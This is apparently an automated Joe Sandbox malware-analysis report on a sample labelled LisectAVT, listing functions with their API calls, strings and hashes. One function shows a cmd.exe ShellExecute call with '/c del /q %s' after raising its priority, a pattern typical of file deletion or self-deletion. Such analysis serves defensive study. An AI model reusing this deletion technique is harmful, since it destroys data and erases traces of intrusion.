Opcode ID: fd59da17ee2276692fb03fdb516e2e04c543a8fa1fff951ef4e141dccde81b2d
Instruction ID: fd83231f287ddcc9b7ba03d260910bff3ef597e25df112102879dd9f36870c4a
Opcode Fuzzy Hash: fd59da17ee2276692fb03fdb516e2e04c543a8fa1fff951ef4e141dccde81b2d
Instruction Fuzzy Hash: AC01D63260011EEFDB2C5A258805BFB3799DB80358F154468EE2AB3180EA30FD41C690

Function 00EF0ED8 Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 00EE620F: GetLastError.KERNEL32(00000000,?,00EEB816), ref: 00EE6213
Part of subcall function 00EE620F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 00EE62B5

EnumSystemLocalesW.KERNEL32(00EF11B6,00000001), ref: 00EF0F22

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 28a208391370ab3dd23a6154d0c85e909c64769ce3e6773af884663cd48e2f6d
Instruction ID: 3735135ccdd89e9aed70e198d1ead94f96aad1a93252e2056cd17dd5eddedca8
Opcode Fuzzy Hash: 28a208391370ab3dd23a6154d0c85e909c64769ce3e6773af884663cd48e2f6d
Instruction Fuzzy Hash: B5F0CD3631030C5FDB24AF399881A7A7B91EB80368B05442CFB45AB692DAB1AC42CA50

Function 00EE78F9 Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 00EE12EA: EnterCriticalSection.KERNEL32(-0002A967,?,00EE5EE7,?,00F059E0,00000008,00EE60AB,?,00EDDD01,?,?,00EDDD01,00ED112E,?,00EE119E), ref: 00EE12F9

EnumSystemLocalesW.KERNEL32(Function_000178EC,00000001,00F05B00,0000000C,00EE7D21,?), ref: 00EE7931

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: bc5d0ccf3ec6a907b7b0dd91f1e89a7c295634637d4ff79bd44a5204161fbe39
Instruction ID: 8540dbf817cf9526056aef2b96c7f9ba6ebc3961c8544850fff248d77a042a20
Opcode Fuzzy Hash: bc5d0ccf3ec6a907b7b0dd91f1e89a7c295634637d4ff79bd44a5204161fbe39
Instruction Fuzzy Hash: C0F03C72A04208DFD700EF99EC06B5D77F0FB48761F00915AF510A72A0CB755905DF51

Function 00EF0DF0 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 00EE620F: GetLastError.KERNEL32(00000000,?,00EEB816), ref: 00EE6213
Part of subcall function 00EE620F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 00EE62B5

EnumSystemLocalesW.KERNEL32(00EF0D4B,00000001), ref: 00EF0E29

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 81f30e786ebf43d07cc17f038a2e05f6ea39f0546d7523294e3d1e793a5ffb28
Instruction ID: c376812dbd9a473324e913af59662f05719b1470787dc4275f69e30912f52c15
Opcode Fuzzy Hash: 81f30e786ebf43d07cc17f038a2e05f6ea39f0546d7523294e3d1e793a5ffb28
Instruction Fuzzy Hash: 58F0E53A3002099BCF04AF76D85567B7F94EFD1764B064059EF099B252C6719943C790

Function 00EF0DF2 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00EE620F: GetLastError.KERNEL32(00000000,?,00EEB816), ref: 00EE6213
Part of subcall function 00EE620F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 00EE62B5

EnumSystemLocalesW.KERNEL32(00EF0D4B,00000001), ref: 00EF0E29

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 1c7288e730939166e50aabc00cfc73e5e715160666cde1dc74a90fea9b7b5444
Instruction ID: ff1717625507a4c77a1c49e62cc7cbc8347afcf4c33a4238ce76430e9395590a
Opcode Fuzzy Hash: 1c7288e730939166e50aabc00cfc73e5e715160666cde1dc74a90fea9b7b5444
Instruction Fuzzy Hash: 0CF0E53A3002099BCF04AF76D85567A7F94EFD1764B064059EF099B251C6719943C790

Function 00EE7E25 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00EE4B8F,?,20001004,00000000,00000002,?,?,00EE4181), ref: 00EE7E59

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 6c2ee267c931d68d2bb74a548080dfd14e89de62341288431de427c8f82521d1
Instruction ID: d35ec20cf4857362cd556e3aa4b1110a9d8378d22f38b277aac9a836d4bc0e52
Opcode Fuzzy Hash: 6c2ee267c931d68d2bb74a548080dfd14e89de62341288431de427c8f82521d1
Instruction Fuzzy Hash: EEE04F3150525CBBCF122F62ED04AAE7F56EF84750F145415FD8575231CB329D21EA94

Function 00EDA57A Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000A586,00ED9D6B), ref: 00EDA57F

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 74d646b0f8578e9293972ba44176960c2e12bc017aa2d7f7b4fb1b99fa45da80
Instruction ID: aee6ef67dd8ca146ba7aaab08770d1e29783ff63493eaac2986b6ab8514c7a28
Opcode Fuzzy Hash: 74d646b0f8578e9293972ba44176960c2e12bc017aa2d7f7b4fb1b99fa45da80
Instruction Fuzzy Hash:

Function 00EF1718 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00EF1718

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 11f58221df90ba892cafb2b83314f9da67c386ddaa751dc5a209192bf12790a1
Instruction ID: d5d8bc405ef5ee41c5db3890f5d0bbd10487bd90e49d463220e1671ab9a7bcb3
Opcode Fuzzy Hash: 11f58221df90ba892cafb2b83314f9da67c386ddaa751dc5a209192bf12790a1
Instruction Fuzzy Hash: CAA011303022028FAB808F32AB082083AB8ABA02C0300802AA008C80A0EE20800AAF00

Function 00EEC3E9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e407ad32b83847db325435d64b71cf4bc587cc9990830d61addc74c018830c0
Instruction ID: 495a30f4a3bf306cc87e7fa75d38d22621d51862d29dba088cad07a784f0bd61
Opcode Fuzzy Hash: 2e407ad32b83847db325435d64b71cf4bc587cc9990830d61addc74c018830c0
Instruction Fuzzy Hash: CF322821D29F494DD7239636C922335A258AFB73C4F35E737E81AB5AA6EB29C4834100

Function 00ED2E50 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 36threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000100), ref: 00ED2E5E
SetPriorityClass.KERNEL32(00000000), ref: 00ED2E65
GetCurrentThread.KERNEL32 ref: 00ED2E6D
SetThreadPriority.KERNEL32(00000000), ref: 00ED2E74
SHChangeNotify.SHELL32(00000004,00000001,?,00000000), ref: 00ED2E88
_fwprintf.LIBCONCRTD ref: 00ED2EA2

Part of subcall function 00ED1170: _fread.LIBCMTD ref: 00ED118A

ShellExecuteA.SHELL32(00000000,open,cmd.exe,?,00000000,00000000), ref: 00ED2EC1
ExitProcess.KERNEL32 ref: 00ED2EC9

Strings

/c del /q %s, xrefs: 00ED2E96
cmd.exe, xrefs: 00ED2EB5
open, xrefs: 00ED2EBA

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: CurrentPriorityProcessThread$ChangeClassExecuteExitNotifyShell_fread_fwprintf
String ID: /c del /q %s$cmd.exe$open
API String ID: 809167050-3932901086
Opcode ID: 3960363030775da73cc876d0f0792134f2a1bf647d3d82fa4617f52eeab43870
Instruction ID: d975c6d1b977ba4cb48d8fe462f36f19b4ce3aef2a2278d111170cc1d7de76f5
Opcode Fuzzy Hash: 3960363030775da73cc876d0f0792134f2a1bf647d3d82fa4617f52eeab43870
Instruction Fuzzy Hash: A9F04975A80304BFE311A7E19D0FFB9372CAB88B02F400454B309A91E1CEF4558CEB62

Function 00EDCCB8 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 00EDCDB5
type_info::operator==.LIBVCRUNTIME ref: 00EDCDD7
___TypeMatch.LIBVCRUNTIME ref: 00EDCEE6
IsInExceptionSpec.LIBVCRUNTIME ref: 00EDCFB8
_UnwindNestedFrames.LIBCMT ref: 00EDD03C
CallUnexpected.LIBVCRUNTIME ref: 00EDD057

Strings

csm, xrefs: 00EDCD62
csm, xrefs: 00EDCE0E
csm, xrefs: 00EDCCF5

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 5270676d37fa7463d93eb49ab777fd3d3616ab7b32e4fe6affc2ffda981b4229
Instruction ID: 10904aa7e71d5167dc7cc15ae674affe5fa428210e7363dafc09a4801919af2d
Opcode Fuzzy Hash: 5270676d37fa7463d93eb49ab777fd3d3616ab7b32e4fe6affc2ffda981b4229
Instruction Fuzzy Hash: 8CB1477190020AEFCF25DFA8C8819AEBBB6FF44354B24516AE8157B312D731DA53CB91

Function 00ED1C30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00ED1C51
_Yarn.LIBCPMTD ref: 00ED1C63
_Yarn.LIBCPMTD ref: 00ED1C72
_Yarn.LIBCPMTD ref: 00ED1C81
_Yarn.LIBCPMTD ref: 00ED1C90
_Yarn.LIBCPMTD ref: 00ED1C9F
_Yarn.LIBCPMTD ref: 00ED1CAE
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00ED1CC5

Part of subcall function 00ED93C2: _Yarn.LIBCPMT ref: 00ED93E1
Part of subcall function 00ED93C2: _Yarn.LIBCPMT ref: 00ED9405

Strings

bad locale name, xrefs: 00ED1CCF

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: Yarn$std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 3904239083-1405518554
Opcode ID: 3c7a8f026297f7f5841ee1623d0955e10f96d2fb3c2827b20bd9611479ad2007
Instruction ID: e79bf89fb09c5b8a1e44e70a49bd8827942631405eb37ec192aac252fcc96722
Opcode Fuzzy Hash: 3c7a8f026297f7f5841ee1623d0955e10f96d2fb3c2827b20bd9611479ad2007
Instruction Fuzzy Hash: E1116DB0A04249EFCB08EB98C955BAEB7B5FF10308F04555AE0123B3C2CB765A01C761

Function 00ED6CA0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 151COMMON

Download Yara Rule

APIs

std::ios_base::good.LIBCPMTD ref: 00ED6CD2
std::ios_base::getloc.LIBCPMTD ref: 00ED6D54
char_traits.LIBCPMTD ref: 00ED6DE8
std::ios_base::good.LIBCPMTD ref: 00ED6E7B

Strings

]t, xrefs: 00ED6DD2
L7, xrefs: 00ED6CB8
L7, xrefs: 00ED6E80

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: std::ios_base::good$char_traitsstd::ios_base::getloc
String ID: L7$L7$]t
API String ID: 1920461149-3775809368
Opcode ID: d153dda6a2d2a6e9d4836cffc8ca026f8c5c1bd1550dbaf678448e416ca91ef9
Instruction ID: 992a26ca3b919e7e2bdb2aeca7dce51d880dee1ad416458b43e86e1de8aa45ac
Opcode Fuzzy Hash: d153dda6a2d2a6e9d4836cffc8ca026f8c5c1bd1550dbaf678448e416ca91ef9
Instruction Fuzzy Hash: 30513CB4E00209DFCB04DF94D892ABEBBB1FF45314F14515AE6127B391DB35A946CB90

Function 00EE7AC6 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00EE7BD5,00EDDD01,?,00000000,u,00000000,?,00EE7DFF,00000022,FlsSetValue,00EFBE90,00EFBE98,u), ref: 00EE7B87

Strings

api-ms-, xrefs: 00EE7B1D
ext-ms-, xrefs: 00EE7B31
u, xrefs: 00EE7ACD

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-$u
API String ID: 3664257935-2083697216
Opcode ID: 49de03d6f948ad93ec2e55c63f6f75f744068107274312185c4e3e4d3dc73dd4
Instruction ID: bca090761a34792d8c0881dfbc26bdbd67e5887b259bb7681a5b3e9c53f06223
Opcode Fuzzy Hash: 49de03d6f948ad93ec2e55c63f6f75f744068107274312185c4e3e4d3dc73dd4
Instruction Fuzzy Hash: 5421307260569CAFD7219F63DC40EAA7359EB41774F201160EE85B7290DF30ED05C6D0

Function 00EF61DA Relevance: 12.2, APIs: 8, Instructions: 248COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 00EF6280
__alloca_probe_16.LIBCMT ref: 00EF633B
__alloca_probe_16.LIBCMT ref: 00EF63CA
__freea.LIBCMT ref: 00EF6415
__freea.LIBCMT ref: 00EF641B
__freea.LIBCMT ref: 00EF6451
__freea.LIBCMT ref: 00EF6457
__freea.LIBCMT ref: 00EF6467

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 47df3083055277c090f4c1ee7354612e5e35908bc6c842d01d652dee68c91639
Instruction ID: 79fc309539608bd7112f4796d303c85d7ca4c25cb1be30506e34e2ba9e5ac777
Opcode Fuzzy Hash: 47df3083055277c090f4c1ee7354612e5e35908bc6c842d01d652dee68c91639
Instruction Fuzzy Hash: 5571D772A0424DABEF20AF548D42BBFB7F9FF45314F242059EA14B7292D7359C048760

Function 00ED9A63 Relevance: 12.2, APIs: 8, Instructions: 175COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00ED9AAC
__alloca_probe_16.LIBCMT ref: 00ED9AD8
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00ED9B17
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ED9B34
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00ED9B73
__alloca_probe_16.LIBCMT ref: 00ED9B90
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00ED9BD2
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00ED9BF5

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: 4e0c03e6d99c598b658462bccf000a6301c3f0b2848b40160f9cdda5aa0a7c32
Instruction ID: f59f998b320c79d0e79a118ece1acec069054bfcdaee47b9686bef9f348097e3
Opcode Fuzzy Hash: 4e0c03e6d99c598b658462bccf000a6301c3f0b2848b40160f9cdda5aa0a7c32
Instruction Fuzzy Hash: 0B51DF7261020AAFEF208F65DC45FAF7BA9EF40748F154127F904B6292DB308D42CBA4

Function 00EE845D Relevance: 10.8, APIs: 7, Instructions: 329COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00EE84E3

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 88fa05fee6af742072e9b0999c7c4b8006f620844c5ab2e84b20edb38d002f48
Instruction ID: 610fc8b7cf9d87dd0efacf0fcd3b115a38501e990be0b793f0cbf171d7045aa3
Opcode Fuzzy Hash: 88fa05fee6af742072e9b0999c7c4b8006f620844c5ab2e84b20edb38d002f48
Instruction Fuzzy Hash: 22B17772A003DE9FDB11CF29CD81BEE7BE5EF55314F246156E948BB282DA709901C7A0

Function 00ED4420 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 157COMMON

Download Yara Rule

APIs

char_traits.LIBCPMTD ref: 00ED443B
char_traits.LIBCPMTD ref: 00ED444E

Strings

, xrefs: 00ED44FF

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: char_traits
String ID:
API String ID: 1158913984-3916222277
Opcode ID: ebca0e1942a551dfc8631ab79acf78a253ca554bbcfc03fc8e05bf69d126a1b1
Instruction ID: 42d2700493d1c14c0ecc6f41394126eddd9f2de2b4faf5ac6bc61d83c1dc1968
Opcode Fuzzy Hash: ebca0e1942a551dfc8631ab79acf78a253ca554bbcfc03fc8e05bf69d126a1b1
Instruction Fuzzy Hash: 6851B2F5D00118ABCB04EB94D4419EEBBB5EF64304F44A0ABE5527B381EB359A46CBA1

Function 00ED7CB0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00ED7CD0
int.LIBCPMTD ref: 00ED7CE9

Part of subcall function 00ED1E00: std::_Lockit::_Lockit.LIBCPMT ref: 00ED1E16
Part of subcall function 00ED1E00: std::_Lockit::~_Lockit.LIBCPMT ref: 00ED1E40

Concurrency::cancel_current_task.LIBCPMTD ref: 00ED7D29
std::_Lockit::~_Lockit.LIBCPMT ref: 00ED7D91

Strings

O^, xrefs: 00ED7D36, 00ED7D46, 00ED7D52, 00ED7D57, 00ED7D39, 00ED7D49

Memory Dump Source

Source File: 00000000.00000002.2194885486.0000000000ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000000.00000002.2194867331.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194906551.0000000000EF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194923538.0000000000F07000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194937340.0000000000F09000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ed0000_LisectAVT_2403002B_246.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
String ID: O^
API String ID: 3053331623-1130408655
Opcode ID: 244c2839b2402f23b20ea5b387b9044c525da466aeb755f1296e91140f7a4eab
Instruction ID: 4c014645fedb3a0a0149f0d0f9a8e43fb1f4c25295ce1fb096bff443ae8a20d2
